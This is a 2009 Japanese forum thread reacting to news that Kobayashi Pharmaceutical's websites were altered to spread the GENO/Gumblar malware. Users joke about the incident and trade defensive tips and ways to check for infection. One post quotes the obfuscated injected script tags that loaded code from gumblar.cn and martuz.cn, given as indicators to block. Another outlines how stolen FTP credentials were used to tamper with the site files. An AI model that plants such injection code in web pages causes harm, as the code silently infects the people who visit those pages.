【セキュリティ】サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]

このエントリーをはてなブックマークに追加
1( ´`ω´)φ ★
□サイトが改ざん被害、閲覧でウイルス感染の可能性(小林製薬)[09/05/14]

 小林製薬株式会社は5月12日、同社の一部のサイトに改ざんが確認された
と発表した。改ざんされたページを閲覧することで、ウイルスに感染する可能性が
あったという。発表によると、改ざん被害を受けたのは5月9日5時27分から5月11日
21時27分の間で、改ざんされたページは以下の通り。

・暮らしのヒントお知らせ隊(hint.kobayashi.co.jp/)
・ハナノア ブランドサイト(hint.kobayashi.co.jp/hananoa/)
・イージーファイバー ブランドサイト(hint.kobayashi.co.jp/easyfiber/)

 これらのページを閲覧することで、ユーザのPCがトロイの木馬に感染する可能性が
あった。この感染により、PCに「sqlsodbc.chmの改変」「コマンドプロンプトが起動不能
になる」「レジストリエディタが起動不能になる」といった影響があるという。
同社ではこれらのページを停止し、復旧作業を行っている。

https://www.netsecurity.ne.jp/1_13282.html (引用元配信記事)
ScanNetSecurity - スキャン・ネットセキュリティ
https://www.netsecurity.ne.jp/ [09/05/14] 配信
http://tsushima.2ch.net/test/read.cgi/newsplus/1242193515/623 依頼

■弊社サイトの改ざんに関するお詫びとご説明〜小林製薬株式会社

閲覧により感染した可能性のある期間

5月9日(土) 5時27分 〜 5月11日(月) 21時27分
※アクセスログを再調査した結果、5月9日(土)5時27分、
上記サイトの一部に改ざんがあった事が判明しました。(更新日:5月14日)
http://www.kobayashi.co.jp/info/090512.html (引用元Web site)
サイトが改ざん被害、原因は管理PCのウイルス感染(薬事日報)2009年04月27日
https://www.netsecurity.ne.jp/1_13221.html (引用元Web site)
2 ◆C.Hou68... :2009/05/17(日) 16:50:19 ID:y3Gke/L70
ニュー速でスレ立ってる奴か。
まとめ見ちゃってびびってた
3名無しさん@九周年:2009/05/17(日) 16:50:26 ID:meZRUQkq0
GENOウィルスもここまで北か
4名無しさん@九周年:2009/05/17(日) 16:50:44 ID:1glB3f690
小林製薬 サイトナオサナイト
5zash:2009/05/17(日) 16:51:32 ID:1LIzJPIY0
ロサイト
6名無しさん@九周年:2009/05/17(日) 16:51:46 ID:3wex6hNz0
現実は豚インフルでネットはGENOウイルスか
7名無しさん@九周年:2009/05/17(日) 16:53:20 ID:bNBXftEOO
小林製薬の糸ようじ
8名無しさん@九周年:2009/05/17(日) 16:53:22 ID:ZiQNUdcJ0
genoの?
9名無しさん@九周年:2009/05/17(日) 16:53:48 ID:RJLNv4HF0
小林製薬の糸ようじ
10名無しさん@九周年:2009/05/17(日) 16:54:05 ID:gt1wPSgJ0
こえぇぇぇ!
2ちゃん見ただけでアホになる
ウィルスと一緒じゃんwww
11名無しさん@九周年:2009/05/17(日) 16:54:16 ID:MlMzRwUwO
平賀サイト
12名無しさん@九周年:2009/05/17(日) 16:55:22 ID:WyZJWF9q0
>>4
小林製薬新たなビジネスチャンス。
13名無しさん@九周年:2009/05/17(日) 16:55:25 ID:G51YAxhg0
「感染そのあとに」
14名無しさん@九周年:2009/05/17(日) 16:56:01 ID:uPmKhQlN0
生活に必要のないものばかりを売る会社
15名無しさん@九周年:2009/05/17(日) 16:58:22 ID:tL4sYMG00
製薬会社がウィルスに感染って笑えるなぁ
16名無しさん@九周年:2009/05/17(日) 16:58:23 ID:buzMpw6xO
ついに立ったか

これ踏んだだけでアウトで、ワクチンないから初期化しかないからな
ブルースクリーン頻発クレカ情報抜かれるし

ちゃんとチェックしとけよ
17名無しさん@九周年:2009/05/17(日) 16:58:58 ID:1glB3f690
小林製薬 ミタダケデアボーン
18名無しさん@九周年:2009/05/17(日) 16:59:37 ID:q/7KjPZU0
これGENOなのか?
19名無しさん@九周年:2009/05/17(日) 17:00:09 ID:rjplnH4I0
ミタラカカール
20名無しさん@九周年:2009/05/17(日) 17:00:20 ID:w3kUr3ABO
小林製薬の糸ようじ
21名無しさん@九周年:2009/05/17(日) 17:00:30 ID:vJIC7omQ0
見ただけで感染というが、ActiveXとJava切ってありゃ問題ないんだろ?
22名無しさん@九周年:2009/05/17(日) 17:01:32 ID:wW1S4AeQP
見ただけでいきなりアウトかぁ
被害者多そうだね
23名無しさん@九周年:2009/05/17(日) 17:01:53 ID:Kfvmxa+T0
>>21
JavaとJavaScriptの区別もついてないようでは危ないな
24名無しさん@九周年:2009/05/17(日) 17:03:06 ID:R63t5gD40
JAVAとJavaScript
25名無しさん@九周年:2009/05/17(日) 17:03:58 ID:m+pYzLXq0
>>15
これ、洒落にならんね、ほんと、
26名無しさん@九周年:2009/05/17(日) 17:04:08 ID:V9iYw9v70
ウィルスばら撒いてワクチンで儲けるのはよくある話だろ
27名無しさん@九周年:2009/05/17(日) 17:04:49 ID:t2RQikMMO
ァッ! 小林製薬
28名無しさん@九周年:2009/05/17(日) 17:05:01 ID:AX9XHBA10
小林製薬の感染元
29名無しさん@九周年:2009/05/17(日) 17:05:40 ID:Kfvmxa+T0
Adobe Flash PlayerとAdobe Readerの脆弱性を突いて感染するので
JavaScript切っておいてもダメだと思う
30名無しさん@九周年:2009/05/17(日) 17:05:55 ID:buzMpw6xO
因みに東方、ボカロの有名サイト感染らしいから
ニコ厨は終わったな
31名無しさん@九周年:2009/05/17(日) 17:06:07 ID:vJIC7omQ0
>>23
JavaScriptのことをJavaって略しただけなんだけど
JavaとJavaScriptの違いぐらいわかってますぅヽ(`Д´)ノプンプン
32名無しさん@九周年:2009/05/17(日) 17:07:40 ID:btmwu36F0
これってGENOウイルス?
33名無しさん@九周年:2009/05/17(日) 17:07:46 ID:SFSzT3r00
なんで小林製薬なんだ?
34名無しさん@九周年:2009/05/17(日) 17:07:58 ID:Kfvmxa+T0
>>32
yes
35名無しさん@九周年:2009/05/17(日) 17:07:59 ID:L1cgFtQ70
小林製薬のホスト感染中
36名無しさん@九周年:2009/05/17(日) 17:08:04 ID:fSGm+YRI0
なんかもうごっちゃになって、院内感染みたいな感じで批判されるだろうな
小林製薬は。全然違うレベルの話なのにな。
37名無しさん@九周年:2009/05/17(日) 17:08:11 ID:+4t/5Adm0
感染たらいいなをカタチにする
38名無しさん@九周年:2009/05/17(日) 17:08:29 ID:5XAEV8wB0
小林製薬の製品ってストレートな名前ばっかなのに、
フェミニーナ軟膏だけ誤魔化してるよな。

マンコール軟膏に改名すべきだ!
39名無しさん@九周年:2009/05/17(日) 17:08:35 ID:G51YAxhg0
企業のトップページって
いちいちフラッシュだのJavaだの使っていてウザイよな。

シンプルに、テキストと画像だけにすれば
見るほうも気楽だし、今回のようなことも無いのに。
40名無しさん@九周年:2009/05/17(日) 17:08:46 ID:KHNVdOYk0
>>31
その顔文字見るとイラつく
41名無しさん@九周年:2009/05/17(日) 17:08:55 ID:hhbSAKUG0
またGENOか
42名無しさん@九周年:2009/05/17(日) 17:09:35 ID:FczDd8r80
非常に凶悪なウイルスなので、感染したPCはOSクリーンインストールするか廃棄してください
現時点で感染前の状態に戻す方法はありません
43名無しさん@九周年:2009/05/17(日) 17:09:37 ID:CyWXf9OK0
クエンカの街を彩る小林製薬の糸ようじ
44名無しさん@九周年:2009/05/17(日) 17:10:25 ID:Kfvmxa+T0
>>39
それだとウェブ屋が高い料金ふっかけられないかららしい
つまり真の犯人はマカ
45名無しさん@九周年:2009/05/17(日) 17:10:25 ID:2xPg7kYO0
GENOウイルス(亜種)はどんどん広がっているな
感染サイト行っただけで感染するのが悲惨
感染したらクリーンインストールしかない
クレカとかのPASも取られるし
フリーアンチウイルスのavast!が対応早いらしいが
46名無しさん@九周年:2009/05/17(日) 17:11:09 ID:1glB3f690
>>38
フェミにいいな→フェミニーナ
47名無しさん@九周年:2009/05/17(日) 17:11:57 ID:FDCij31OO
>>38
>デリケートゾーン

kwsk
48名無しさん@九周年:2009/05/17(日) 17:12:11 ID:G51YAxhg0
>>44
なるほど、アホな話だなぁ。

重いページにイラついて、二度とそのページに行かない奴だっている。
それって、ビジネスチャンスを逃してるって事なのにね。
49名無しさん@九周年:2009/05/17(日) 17:14:04 ID:Kfvmxa+T0
FTPじゃなくてSSH使ってればサーバへの侵入は防げたのにな
しかも外からFTPで接続出来るとか馬鹿じゃねーの?って感じ
これも「SSHはわかりません」とか平然とぬかしやがる
腐れマカのウェブ土方のせいだよな
50名無しさん@九周年:2009/05/17(日) 17:14:06 ID:/KtaJlqi0
なんだか最近、PCが変だ・・。
オレも感染したかも。

・気がついたらAVGの常駐アイコンが消えていた。
・avgの自動更新が出来なくなった。
・CCクリーナーが使えなくなった(ファイルが壊れてると表示される)
51名無しさん@九周年:2009/05/17(日) 17:14:36 ID:9I+wnxDB0
ウイルスまとめてポイ
52名無しさん@九周年:2009/05/17(日) 17:14:40 ID:ZiQNUdcJ0
>>48
FLASHが重いサイトは、余程魅力がないと二度と行かないよな。
53名無しさん@九周年:2009/05/17(日) 17:15:32 ID:LtvQA1cl0
>>48
社内の人にウケるかどうかが大事でそれが全てだからそうなるのは仕方ない
54名無しさん@九周年:2009/05/17(日) 17:15:48 ID:zJwCDwmv0
スクリプトとか切ってるのでフラッシュ無しで見られないとこはスルー
55名無しさん@九周年:2009/05/17(日) 17:16:30 ID:Kfvmxa+T0
https://www.netsecurity.ne.jp/1_13221.html

1.「同サイト」を管理していた「社内PC」1台にコンピュータウイルスが感染
2.コンピュータウイルスは感染した「社内PC」のFTP通信を監視
3.コンピュータウイルスは感染した「社内PC」のFTP通信で使用された「設定情報」を記録
4.コンピュータウイルスは記録した「設定情報」を同社とは無関係の外部サーバに転送
5.外部サーバは「設定情報」を利用し「同サイト」にFTP通信で不正にアクセス
6.外部サーバは「同サイト」のhtml,php,js等のウェブ関連ファイルの一部をダウンロード
7.外部サーバはダウンロードしたファイルに悪意あるスクリプトを一定条件のもとに挿入
8.外部サーバはダウンロードしたファイルを「同サイト」にアップロード
56名無しさん@九周年:2009/05/17(日) 17:18:47 ID:YYQFJPoa0
こっちでも感染か・・・
57名無しさん@九周年:2009/05/17(日) 17:19:46 ID:nXnEpJEt0
BackTrackを使ってセキュリティをテストする - SourceForge.JP Magazine
ttp://sourceforge.jp/magazine/08/06/17/017244
Remote-Exploit.org - Supplying offensive security products to the world
ttp://www.remote-exploit.org/backtrack.html

backtrack - Google Search
ttp://www.google.com/search?q=backtrack
58名無しさん@九周年:2009/05/17(日) 17:22:40 ID:mWX/de6T0
小林製薬のバックドア
59名無しさん@九周年:2009/05/17(日) 17:22:55 ID:sE2TA4mS0
アンチウイルスとアドビ関係のアップデートしてれば大丈夫だろうに
なんで感染するかなぁ
60名無しさん@九周年:2009/05/17(日) 17:24:11 ID:nXnEpJEt0
「よく使われる危険なパスワードTop500」にご注意を
ttp://slashdot.jp/security/comments.pl?sid=433667&cid=1486395

>実体験 (スコア:5, 参考になる)
>sayuporn (33927) : 2009年01月06日 20時38分 (#1486395) 日記

>サーバをインストールして、先方に渡し、
>DCに設置してもらってネットにつながってから色々作業しようと思ってました。
>で、rootのパスワードに「123456」を設定してました。

>メールで「ネットにつなぎましたよー」と連絡もらって、
>さあ作業しようと思ったらログインできません。ぎゃふん。
>東京から横浜まで行ってもらい、パスワードを再設定してもらいましたが、
>同じく「123456」だったので、その方がDCを出る頃にはまたワームに犯されてました。

>ワームに犯された上、ルートキットを孕ませられてしまったので、
>passwdでパスワードを変更してもshadowファイルを書き換えられてしまいます。
>のでしょうがないので、cronで1分おきにshadowファイルを上書きするようにして、
>泣きべそ書きながらrsyncでルートキットを駆除しました。
61名無しさん@九周年:2009/05/17(日) 17:24:35 ID:G51YAxhg0
>>52-53
社内のLAN経由で表示テストして
実際の回線を使った場合、どれだけ重いのか気が付かないとか
ありそうだよね。
62名無しさん@九周年:2009/05/17(日) 17:25:03 ID:x6GlOTwx0
この前、殺虫剤のCMが気になって製薬会社のホムペ見たからドキッとしたけどコヴァか、よかった見たのは緊張だった

♪うちの亭主はグアテマラ生まれ〜
63名無しさん@九周年:2009/05/17(日) 17:26:32 ID:iBJfCT+b0
>>53
ワンマンで、頭の悪い、センスの無い社長の会社の場合、
よいしょして社長をコマーシャルに出させる、ってのと似た感じの戦略だな。
64名無しさん@九周年:2009/05/17(日) 17:27:21 ID:zDQ/f9yU0
オンラインゲームでは数年前からあったな、そっちの犯人は中国だが。
65名無しさん@九周年:2009/05/17(日) 17:28:28 ID:Kfvmxa+T0
このレベルの会社は自社でサーバを立てるべきじゃないよ
適当な大手のブログを選んで、
そこに自社のページを作る程度で妥協しておくべきだ
まぁブログへのアクセスにSSL使わなきゃやっぱりやられてたかもしれんがw
66名無しさん@九周年:2009/05/17(日) 17:29:28 ID:m5beBtZT0
>>65
政府関連の天下り機関は金があるので自社サーバー
67名無しさん@九周年:2009/05/17(日) 17:30:25 ID:B0ePSMlA0
>>47
おれもでデリケートゾーンがなんなのか気になって眠れない毎日を過ごしてる。
デルピエロゾーンの仲間?
68名無しさん@九周年:2009/05/17(日) 17:33:10 ID:B0ePSMlA0
>>48
>>39
>>52
>>63
お前らは一度フジテレビのホームページに行ったほうがいい。
69名無しさん@九周年:2009/05/17(日) 17:34:23 ID:Kfvmxa+T0
>>67
スクール水着の裏地が付いてる部分のことだ
70名無しさん@九周年:2009/05/17(日) 17:34:48 ID:4I8DSniBO
感染したかな…

ウイルス対策ソフトの期限切れててさ…
71名無しさん@九周年:2009/05/17(日) 17:36:27 ID:Sf8IhdqH0
改ざんするにしてもなんで小林製薬なんだろうね?
俺が知らないだけでものすごい人気サイトだったとか?
72名無しさん@九周年:2009/05/17(日) 17:36:27 ID:RkuI9rV60
martuz.cnに飛ぶパターン
成美堂出版HP <script src=//mar"+"tuz.cn/vid/?id="+j+"><\/script>
replica08●web●fc2●com <script src=//m"+"artuz.cn/vid/?id="+j+"><\/script>
sound●jp/yudai_marimba/ <script src=//ma"+"rtuz.cn/vid/?id="+j+"><\/script>

gumblar.cnに飛ぶパターン
www●laqoo●net/kyouun/pet/index.html <script src=//gumblar.cn/rss/?id="+j+"><\/script>
pmpk●dojin●com <script src=//gumblar.cn/rss/?id="+j+"><\/script>
 
 
hosts書き換えて「zlkon.lv」「gumlar.cn」「martuz.cn」をアウトにしておくと(今は)OK
ただこの3つ以外にもあるかもしれないし、今後は増える
hosts書換えが嫌ならローカルプロキシとかプライベートプロキシとかの「PC内プロキシ」を入れて使えばいい
 
 
結論:adobeを今すぐ最新にすればいいだけじゃん(既に感染してたらクリーンインスコ♪)
73名無しさん@九周年:2009/05/17(日) 17:37:06 ID:eXh7UztbO
>>59
セキュリティソフト入れたりWindowsアップデートはする人が多いけど
adobeのソフトウェアのアップデートはあまりする人がいないからじゃないかな
最近感染した人はともかくGENO初期はavast以外検出出来なかったし
74名無しさん@九周年:2009/05/17(日) 17:37:17 ID:YbvbSUCE0
チンコムケア
75名無しさん@九周年:2009/05/17(日) 17:39:08 ID:M0r8lB9T0
>>65
サービスで提供されてるブログ記事書くのにSSLって一般的なの?

そもそも大手会社のサイト管理者の端末が
ウイルスに汚染されてるっていうのが凄いなー。どっから貰ったんだろ。
76名無しさん@九周年:2009/05/17(日) 17:47:01 ID:dWj9SGss0
>>1

新たな「Webウイルス」が猛威、感染被害が急増:ITpro
英ソフォスが報告、正規サイトでもWebアクセスで被害の恐れ
http://itpro.nikkeibp.co.jp/article/NEWS/20090515/330053/

>今回報告されたウイルスは、同社が「JSRedir-R」と命名したもの。
>実体はJavaScriptで書かれたプログラム(図1)。多くの場合、攻撃者は何らかの方法で正規サイトに不正アクセスし、
>このウイルスをWebページに埋め込む。そのページにユーザーがアクセスすると、
>埋め込まれたウイルスが動き出し、別のウイルスを勝手にインストールされる恐れなどがある。

>同社がこのウイルスを確認したのは2009年4月30日。その後、感染報告数が急増。
>2009年5月6日から同月13日までの同社の観測データでは、
>Webページに埋め込まれるタイプのウイルスの42%が、このJSRedir-Rだったという

アドビ、深刻度「最高」の脆弱性を修正するReader/Acrobatのアップデートを公開(Computerworld.jp) - Yahoo!ニュース
http://headlines.yahoo.co.jp/hl?a=20090515-00000005-cwj-secu
77名無しさん@九周年:2009/05/17(日) 17:47:16 ID:7/BF9jCV0
AntiVir入れてる俺のPCには無関係な話だよな?
78名無しさん@九周年:2009/05/17(日) 17:49:41 ID:8y57DQ3b0
>>4
wwwwwwwwwwwww
79名無しさん@九周年:2009/05/17(日) 17:52:59 ID:MG5Ab7Vq0
ページ見ただけで感染だから
豚なんとかより遥かに感染力高くて恐ろしいウイルスなのに
まだ知らない人多そうだよな
80名無しさん@九周年:2009/05/17(日) 17:55:05 ID:RheIUslP0
>>1
441 名前: ムラサキサギゴケ(catv?)[sage] 投稿日:2009/05/16(土) 23:32:08.96 ID:K/FFIX2k
・小林製薬【対策済】
・BIG-server.com【対策済】
・ウェルネス(医療情報提供企業)【対策済】
・薬事日報社【対策済】
・国交省中部地方整備局岐阜国道事務所【対策済】
・全日本民医連【対策済】
・総合ホビー展示即売会「ビコン」公式サイト【対策済】
・GENO(PC通販ショップ)【キャッシュ削除済】
・NHT紀尾井町グループ(自毛植毛斡旋企業)【対策済】
・SayMove!【対策済】
・ライブハウス「あさがやドラム」【対策済】
81名無しさん@九周年:2009/05/17(日) 17:55:19 ID:4+wV/Q9L0
>>71
「製薬会社」なのに、「ウィルスに感染」っていうネタじゃねーの?
82名無しさん@九周年:2009/05/17(日) 17:55:35 ID:MG5Ab7Vq0
adobeのソフト最新版にするのは効果的だけど
アンチウイルスソフトは
亜種の多さからほとんど対応できてないから注意
83名無しさん@九周年:2009/05/17(日) 17:55:36 ID:yvqhkU2e0
acrobat7使ってるんだが、やばいのか
アップデート無いんだが
84名無しさん@九周年:2009/05/17(日) 17:56:15 ID:GEs3+X//0
どんだけ新型の感染拡大が広がってるんだよ・・・
85名無しさん@九周年:2009/05/17(日) 17:59:11 ID:YNedgkNj0
>>50
あきらめて、クリーンインストールしろ。
>>59
セキュリティソフトは結構ザルだったみたいよ。
それに重くなるので、アドビ関係のアップデートしない奴多い。
86名無しさん@九周年:2009/05/17(日) 17:59:11 ID:PkC78V030
>>81
思いつかなかったww
87名無しさん@九周年:2009/05/17(日) 17:59:32 ID:3O1zdxkZ0
avast!は対応済みか、今度そっちも入れようかな
これってネカフェも怖いな、とりあえず
Adobe Flash PlayerとAdobe Reader最新のを
入れておいたらおk?

あとブラウザーはOperaかfirefoxもいいとかあったけど本当?
88名無しさん@九周年:2009/05/17(日) 18:01:14 ID:Kfvmxa+T0
>>75
ログイン画面くらいはSSLの所探せばあるだろ
でも終わったらログアウトを習慣付けないとクッキー取られてだめか
89名無しさん@九周年:2009/05/17(日) 18:01:17 ID:cL9LjXcP0
カスペってまだ対応してないの?
90名無しさん@九周年:2009/05/17(日) 18:01:33 ID:F4E208RW0
>>81
ジョークグッズ屋だから、ピンとこないのも仕方が無い
91名無しさん@九周年:2009/05/17(日) 18:02:18 ID:M0r8lB9T0
>>87
プロキシとかファイアウォールとか、その辺の対策無しで
javascript切ってないんだったらブラウザ変えても意味無い気がするけど。
92名無しさん@九周年:2009/05/17(日) 18:03:08 ID:G51YAxhg0
>>87
firefoxで、アドオン「NoScript」ってのを入れておくといい。

基本、全てのスクリプトをOFFにしておいて
サイト観覧で不都合が出た時だけ、個別にONにすることが出来る。
便利だよ。
93名無しさん@九周年:2009/05/17(日) 18:04:03 ID:yvqhkU2e0
chromeはそこらへん融通きかんのだよなぁ・・・
94名無しさん@九周年:2009/05/17(日) 18:04:58 ID:TeEJ1mvY0
「GENOウイルスだそうです」
「痔のウイルスか…当社製品に塗り薬あったかな」
95名無しさん@九周年:2009/05/17(日) 18:05:03 ID:3O1zdxkZ0
>>79
そりゃTVでやっていないからな、そんなもの
96名無しさん@九周年:2009/05/17(日) 18:05:10 ID:Kfvmxa+T0
>>85
MSがWindows UpdateでFlashとAdobe Reader配布するようにして欲しいな
ていうかサードパーティーがWindows Update利用する枠組み提供しろや

>>87
Firefox入れるだけじゃなくnoscriptアドオンも併用しないとだめ
97名無しさん@九周年:2009/05/17(日) 18:05:50 ID:M0r8lB9T0
>>88
ブログサービスってあんまり使わないから
httpsで接続できるのってmixiくらいしか見たこと無いな。
98名無しさん@九周年:2009/05/17(日) 18:09:24 ID:kHTwEh5Z0
Flash Blockも合わせて使っちゃいなYO
99名無しさん@九周年:2009/05/17(日) 18:11:12 ID:Kfvmxa+T0
NoScript入れとけばFlashblockはいらなくね?
100名無しさん@九周年:2009/05/17(日) 18:13:10 ID:XLA9dGGF0
マカフィー使っている俺には関係ない話だな
101名無しさん@九周年:2009/05/17(日) 18:13:18 ID:kHTwEh5Z0
>>99
そうか・・・
にわかでスマン
102名無しさん@九周年:2009/05/17(日) 18:16:14 ID:Kfvmxa+T0
>>101
あーでもNoScript使ってて不満なのは
許可与えるとJavaScriptもFlashも両方いっぺんに解除されちゃう事なんだよな
JavaScriptだけ許可してFlashだけブロックしたいって事はあるかも
103名無しさん@九周年:2009/05/17(日) 18:25:29 ID:B0ePSMlA0
>>100
マカフィー使ってれば安全なのか?
104名無しさん@九周年:2009/05/17(日) 18:26:06 ID:Kfvmxa+T0
>>100
マカと間違われて困ったりしないか?
105名無しさん@九周年:2009/05/17(日) 18:27:02 ID:tXLIVLGn0
ウィルスバスター常駐監視の俺でもやられた
パターンファイルのアップロード中は常駐監視がオフになるという
基本的な事を無視してあるサイトの画像をダウンロードしたのが原因
一番最初に起動ファイルを壊されて再起不能
結局はOSのクリーン再インストール
とんでもねえ目にあっちまったべ
106名無しさん@九周年:2009/05/17(日) 18:27:54 ID:BCJHPilA0



    サーバはlinuxを使え!


107名無しさん@九周年:2009/05/17(日) 18:28:41 ID:kHTwEh5Z0
>>100
それはオカフィーだろ
108名無しさん@九周年:2009/05/17(日) 18:29:15 ID:4QOyX94H0
タミフルでも打っとけ
109名無しさん@九周年:2009/05/17(日) 18:32:19 ID:Kfvmxa+T0
110名無しさん@九周年:2009/05/17(日) 18:40:47 ID:TofX6c5mO
Avast使っててよかった。でも小林製薬なんか見ないよ。
111名無しさん@九周年:2009/05/17(日) 18:45:52 ID:vx8AJ1AOO
小林製薬の、糸ようじ
112名無しさん@九周年:2009/05/17(日) 18:48:35 ID:Kfvmxa+T0
IPをwhoisしてみるとファーストサーバでホスティングかレンタルしてたんだな
そこにFTPで呑気に接続してたのか
113名無しさん@九周年:2009/05/17(日) 19:09:30 ID:zDQ/f9yU0
伸びないね、かなり重要なことなのに
114名無しさん@九周年:2009/05/17(日) 19:10:35 ID:DxbzHqQO0
>>108
タミフルは注射じゃないですけど
115マスゴミ:2009/05/17(日) 19:11:33 ID:jrk03S1p0
パソコンにマスクをつけていないから
116名無しさん@九周年:2009/05/17(日) 19:12:13 ID:oqxyZng/0
VistaはUACが警告を出すので、普通に使ってる限りは大丈夫
117名無しさん@九周年:2009/05/17(日) 19:19:36 ID:Kfvmxa+T0
>>113
このスレが伸びるくらいならVistaの売上ももうちょっと伸びてるだろw
118名無しさん@九周年:2009/05/17(日) 19:22:15 ID:v6RnnzSp0
また中国の仕業だな

国際社会から追放しろよ
119名無しさん@九周年:2009/05/17(日) 19:23:14 ID:Tig68MPaP
感染その後に

ここの製品はネーミングだけじゃなく効能も胡散臭い気がする
120名無しさん@九周年:2009/05/17(日) 19:30:47 ID:YibAUnjQi
あっ!小林製薬。
121名無しさん@九周年:2009/05/17(日) 19:30:57 ID:Kfvmxa+T0
まあ小林製薬はへぼかったけど、
カカクコムメソッドがはびこる今の日本で
感染の経緯をつきとめ正直に公開した事は評価したい
対策が出来たらそれも公表して欲しいね
122名無しさん@九周年:2009/05/17(日) 19:31:44 ID:SbqicqqD0
NOD32を使ってるけどやられてる可能性あるのかな。このソフト信用してるだが。
123名無しさん@九周年:2009/05/17(日) 19:33:58 ID:s3D0yKJO0
心当たりがあったので、今、ウィルスチェックしてみたけど
感染しなかったようだ。一安心
124名無しさん@九周年:2009/05/17(日) 19:34:14 ID:Q0o8sjQ40
>>122
125名無しさん@九周年:2009/05/17(日) 19:35:57 ID:1toqui/z0
GENOの対策はキャッシュ消去してくださいはワラタな
126名無しさん@九周年:2009/05/17(日) 19:36:10 ID:RQfnAajI0
ヤフーも地震速報見たいな感じでアップデート促してくれたらいいのに
127名無しさん@九周年:2009/05/17(日) 19:37:47 ID:o60Os+8/0
クアンカの街を彩る・・・小林製薬の糸ようじ!
128名無しさん@九周年:2009/05/17(日) 19:38:33 ID:DEzBaMLcO
>107
129名無しさん@九周年:2009/05/17(日) 19:50:51 ID:LNYnyzax0
>>125
なんだそれwwひでぇwww
130名無しさん@九周年:2009/05/17(日) 19:51:55 ID:HU0QK/430
何が目的でこんな事するんだ
131名無しさん@九周年:2009/05/17(日) 19:52:48 ID:ZxOtT8x60
しかし俺毎日GENO見てたのに
なんでかかってないんだろ
かかってて気づいてないだけかもしれんが
132名無しさん@九周年:2009/05/17(日) 19:56:07 ID:1S1N9irE0
ニフティの件はデマだったのか?
だったらデマスレ立てたやつは逮捕でいいよ
133名無しさん@九周年:2009/05/17(日) 19:57:36 ID:o90lLzmk0
【感染の確認方法】
@cmd.exe(コマンドプロント)、regedit.exe(レジストリエディタ)が起動するか確認する
 ※このウイルスに感染しているとコマンドプロンプト、レジストリエディタが立ち上がらない。
 ■確認方法
 1.スタートから「ファイル名を指定して実行」
 2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
   「regedit.exe」と入力して「OK」ボタンを押す。
   ※立ち上がったことを確認したら弄らず閉じること。
 3.同様に、「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   ※立ち上がったことを確認したらAへ

Asqlsodbc.chmのファイルサイズの確認を確認する
 ■Windows XP:
  改ざんされていなければ
  C:\WINDOWS\system32\sqlsodbc.chm 50,727 bytes
 ■Windows 2000:
  そもそも存在しないはずなので、
  C:\WINDOWS\system32\sqlsodbc.chmが無いことを確認。
 ■確認方法
  1.スタートから「ファイル名を指定して実行」
  2.「ファイルを指定して実行」という画面が出てくるので、入力欄に
  「cmd.exe」(全部小文字で)と入力して「OK」ボタンを押す
   →背景が黒いウィンドウが開いた場合3へ
   →起動しない場合:感染疑い濃厚
  3.背景が黒いウィンドウを選択。
   小文字で「dir C:\WINDOWS\system32\sqlsodbc.chm」と入力してEnterキー

Bavast!(無料のアンチウイルスソフト)で確認
134名無しさん@九周年:2009/05/17(日) 19:59:45 ID:eWz/jZxu0



>たしかにMacもOS9以前はシングルユーザーのOSだったから、デスクトップ上で起こった
>こと=システム全体に即影響で深刻なウイルスもあったが、OS XでマルチユーザーのUNIX
>になったことでシステムに勝手に変更を加えるようなウイスルは一切シャットアウトでき
>るようになった。
>
>恐ろしいのは、XPはデフォルトのユーザーが管理者権限のため実行上はシングルユーザー
>のOS9以前と同じ状況だということ。
>Windowsばかりウイルスが蔓延するのはそういう理由。



135名無しさん@九周年:2009/05/17(日) 20:00:07 ID:l6DtaFMu0
こういう事する奴って一体何が目的なの?何が楽しいんだ?
動機は何だ?小林製薬に対する恨み?
136名無しさん@九周年:2009/05/17(日) 20:02:35 ID:SHPDjQGn0
>>135
政権交代
137名無しさん@九周年:2009/05/17(日) 20:03:54 ID:2J0GbIiF0
>>1
恐くてどこのサイトにも行けねぇ・・・
138名無しさん@九周年:2009/05/17(日) 20:04:50 ID:We5mkVjl0
意外とやばい話題なのに現実世界のパンデミックのせいで盛り上がらんね
139名無しさん@九周年:2009/05/17(日) 20:05:30 ID:7c1qILxa0
>>1
https://www.netsecurity.ne.jp/1_13221.html
ウィルスが直接サイト改ざんするんじゃなくて外部サーバを経由するのか。
ていうことは、この外部サーバがランダムなアドレスとかだとアクセスログ監視でも見つけにくいな・・・
140名無しさん@九周年:2009/05/17(日) 20:08:29 ID:vWubysrZ0
これ結構やばくないの
141名無しさん@九周年:2009/05/17(日) 20:09:05 ID:We5mkVjl0
単にFTP鯖の外部からのアクセス切るかホワイトリストにすりゃいいだけ

一般ユーザならともかく、Webサービスやってる企業で固定IP引いてないって事はないだろ
142名無しさん@九周年:2009/05/17(日) 20:09:29 ID:Jz14ghBH0
カカクコムほどではないだろ
143名無しさん@九周年:2009/05/17(日) 20:11:52 ID:We5mkVjl0
価格コムより酷いよw

ねずみ算式に感染元が増えるんだから
144名無しさん@九周年:2009/05/17(日) 20:13:15 ID:zcVlGHXm0
やっとか。
一部の板では一昨日から大騒ぎになっていたというのに
145名無しさん@九周年:2009/05/17(日) 20:15:37 ID:YTw7rQla0
Windowsでネットするなんて神戸の高校に全裸で父兄参観するようなもんだろw
アンチウイルスなんてどこまでいっても対処療法。
OSの作り自体が悪いんだから、いつまでたっても抜本的には解決しないよ。

146名無しさん@九周年:2009/05/17(日) 20:18:41 ID:zd/mvz7G0
 .糸 .小
 .よ 林
  う 製
  じ 薬
    の
147名無しさん@九周年:2009/05/17(日) 20:19:59 ID:sMo+lYPKO
質問!
なぜクリーンインストールじゃないと直せないんだ?
ファイル上書きでなんとかなりそうだが
148名無しさん@九周年:2009/05/17(日) 20:21:10 ID:We5mkVjl0
広がりに輪をかけてる一因として
突いてる脆弱性がAdobeのJavascriptインタプリタだからってのがある

Adobeって普及率稼いでる割に自動アップデートとかしないんだよね
致命的な欠陥でも告知しねえし

脆弱性自体は数ヶ月前に塞がれている物なのに
ユーザにアップデート告知しないで脆弱性の修正だけ公開したから
攻撃手段だけ公開したような状態になってる

本格的にバカかと
149名無しさん@九周年:2009/05/17(日) 20:21:18 ID:1htYmMT60
やばいいいいいいいいいい
150名無しさん@九周年:2009/05/17(日) 20:26:59 ID:We5mkVjl0
>>147
改竄されるファイルがまだ全て判明してないから
亜種が出るのが早いって理由もある
151名無しさん@九周年:2009/05/17(日) 20:28:57 ID:B222yddUO
ロリコンサイトへのウイルス埋め込みにも対処して下さい。
パソコン一台潰しちゃいました
152名無しさん@九周年:2009/05/17(日) 20:30:53 ID:dg3Mksro0
